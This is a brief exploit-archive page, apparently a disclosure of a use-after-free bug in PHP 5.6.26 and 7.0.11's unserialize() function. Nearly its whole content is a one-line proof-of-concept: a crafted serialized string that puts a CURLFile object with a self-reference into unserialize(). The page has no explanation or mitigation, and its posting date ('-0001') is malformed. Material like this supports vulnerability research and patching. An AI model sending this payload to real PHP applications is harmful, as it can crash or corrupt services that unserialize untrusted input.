Home / os / solaris

PHP 5.6.26 and 7.0.11 Use After Free in unserialize

Posted on 30 November -0001

<HTML><HEAD><TITLE>PHP 5.6.26 and 7.0.11 Use After Free in unserialize()</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>PoC: <?php $poc = 'a:1:{i:0;O:8:"CURLFile":1:{s:4:"name";R:1;}}'; unserialize($poc); ?> </BODY></HTML>

 

TOP